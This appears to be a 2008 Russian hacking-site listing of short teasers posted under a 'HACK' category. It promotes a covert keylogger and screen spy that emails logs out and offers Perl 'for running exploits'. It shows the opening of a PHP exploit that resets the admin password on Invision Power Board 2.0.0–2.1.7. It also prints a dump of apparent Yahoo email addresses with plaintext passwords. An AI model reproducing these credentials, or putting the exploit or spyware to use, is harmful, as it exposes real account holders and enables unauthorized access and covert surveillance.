Программа шпионит за действиями пользователя... Имеет невидимый и видимый режимы, хватает все события(нажатие клавиш, запуски, уничтожения, активизацию, CD-ROM, Clipboard, Мышь, Сеть, Интернет, события оболочки с возможностью запрета, события файловой системы(удаление, переименование, создание файлов/каталогов,подключение/отключение сетевых дисков и т.д. и т.п.) и т.д. и т.п. А так же авто и ручная отсылка лога по почте, автообслуживание и шифрование лога, внешний расшифровщик и просмотрщик, а так же экранный шпион, делающий снимки не только на Desktop`е, но и в играх, видеофильмах и т.д. Из дополнительных функций ограничение доступа, автоимпорт/автоэкспорт настроек и т.д. Все подробно и понятно программа пишет в лог, оформленный в виде базы данных. Включает подрбный хелп на русском.
Очень удобный пакет для написания cgi-скиптов. Включает в себя не только Perl for Win32 (транслятор, который можно установить и отдельно), но и Perl for ISAPI - plug-ins для IIS, а также PerlScript (ActiveX engine) и Perl Package Manager. Ну а поскольку большинство сплойтов написано на Perle, то непременно понадобиться и ActivePerl с помощью которого и осуществляется запуск cgi-скриптов..Загружаем.
Удобный редактор ASM-файлов. Настроен на пакет MASM32, но может работать и с другими компиляторами.
Категория:
HACK
|
Просмотров:
510
|
Добавил:
hakie
|
Дата:
15.06.2008
|
|
Zap2-anonimnost pri vzlome
Категория:
HACK
|
Просмотров:
542
|
Добавил:
hakie
|
Дата:
15.06.2008
|
|
To illustrate the points we have covered so far, I’d like to share a real-life story with you that happened to me a few months ago. We were hired by the CIO of a large bank in Texas to perform an internal and external penetration test and site assessment. What happened within the first 45 minutes will hopefully shock you. We have been talking about the first steps in building an Information Security Program that really works, and most importantly we are beginning to lay down the foundation of a “layered” security approach. This story will clearly illustrate why that is a good idea.
When I begin to perform a site assessment, I will usually arrive at the bank’s main administrative office 30 minutes before opening. While in the parking lot, I can easily check for wireless devices, and drive around the building looking for possible entrances. I especially look for employee entrances, designated smoking areas, and external telco closet doors. As the traffic begins to pick up in th
...
Читать дальше »
Категория:
HACK
|
Просмотров:
628
|
Добавил:
hakie
|
Дата:
09.06.2008
|
|
Banks all over the world can be hacked and PIN numbers seized by exploiting a flaw in a common cryptoprocessor made by IBM, researchers from Cambridge University have found.
The cryptoprocessor in question, the IBM 4758, sits at the end of cash machines and scrambles the PIN number that people type in, as well as the program used to verify the PIN at the other end.
It uses a minimum 64-bit encryption (112-bit for keys), conforms to the US Data Encryption Standard FIPS 140-1 Level 4 and was thought to be impossible to crack, even physically. But the problem does not lie with the cryptoprocessor but the software it runs on - Common Cryptographic Architecture (CCA), which comes free with the 4758.
The CCA software requires two or more people to combine their access priviledges before any security changes can be made. As such, it was thought that codes could only be cracked if there was collusion betw
...
Читать дальше »
Категория:
HACK
|
Просмотров:
492
|
Добавил:
hakie
|
Дата:
09.06.2008
|
|
How To Hack A Bank David H. Freedman, 04.03.00 THE FINER POINTS [1] Of eight respected computer security experts consulted for this article, all agreed that hacking into a bank was doable, and most insisted it wouldn't be all that hard. "If I were going into e-crime, I'd hit a bank," says Jon David, a security guru who has worked in the field for 30 years. Why haven't banks been hacked, then? Oh, but they have--big time. In 1994, a 24-year-old programmer in St. Petersburg, Russia, named Vladimir Levin hacked Citibank for $10 million. He was later caught, extradited to the United States and is serving a three-year sentence. (All but $400,000 of the money was recovered.) This sort of thing happens often but is hushed up, according to Michael Higgins, a former analyst with
...
Читать дальше »
Категория:
HACK
|
Просмотров:
580
|
Добавил:
hakie
|
Дата:
09.06.2008
|
|
Категория:
HACK
|
Просмотров:
519
|
Добавил:
hakie
|
Дата:
02.06.2008
|
|
tatulikaaa@yahoo.com 123456 viktor_balancini@yahoo.com vikuliablia tengo_mikava@yahoo.com trachiko vepkhia@yahoo.com picaluga buto_nirvana@yahoo.com cradleoffilth qetanuka@yahoo.com kongresi latalien@yahoo.com 23230909 entry_side@yahoo.com mariami irina_hoho@yahoo.com 236963 ssefishvili@yahoo.com chopre nuci.boboda@yahoo.com nuciko xxxxx855@yahoo.com 271085 zukariko@yahoo.com chornibumer s_eristavi@yahoo.com bebebe gugsusa@yahoo.com 9101980 mqueen1972@yahoo.com miki ilia_undilashvili@yahoo.com 777758 ninooo_86@yahoo.com giorgi ramemomtsere@yahoo.com yahooyahoo gamoiqeci@yahoo.com 123456 gioroinishvili@yahoo.com 123321 ich_bich@yahoo.com pacukela tornike_am
...
Читать дальше »
Категория:
HACK
|
Просмотров:
1198
|
Добавил:
hakie
|
Дата:
02.06.2008
|
|
/*
Debug Mode password change vulnerability Affects Invision Power Borard 2.0.0 to 2.1.7 by Rapigator
This works if:
"Debug Level" is set to 3 or Enable SQL Debug Mode is turned on
In General Configuration of the forum software.
*/
// The forum's address up to and including 'index.php' $site = "http://localhost/forums/index.php";
// An existing user's login name $name = "admin";
// The new password(3-32 characters) $pass = "1234";
// You can use a proxy... // $proxy = "1.2.3.4:8080";
// ----------------------------- $site .= "?"; $suffix = ""; $name = urlencode($name); $pass = urlencode($pass); $curl = curl_init($site.'act=Reg&CODE=10'); curl_setopt($curl, CURLOPT_PROXY, $proxy); curl
...
Читать дальше »
Категория:
HACK
|
Просмотров:
549
|
Добавил:
hakie
|
Дата:
02.06.2008
|
| | |
|
Форма входа |
|
 |
Календарь новостей |
« Сентябрь 2025 » |
Пн |
Вт |
Ср |
Чт |
Пт |
Сб |
Вс |
1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | |
 |
Поиск |
|
 |
Статистика |
Онлайн всего: 1 Гостей: 1 Пользователей: 0 |
 |
|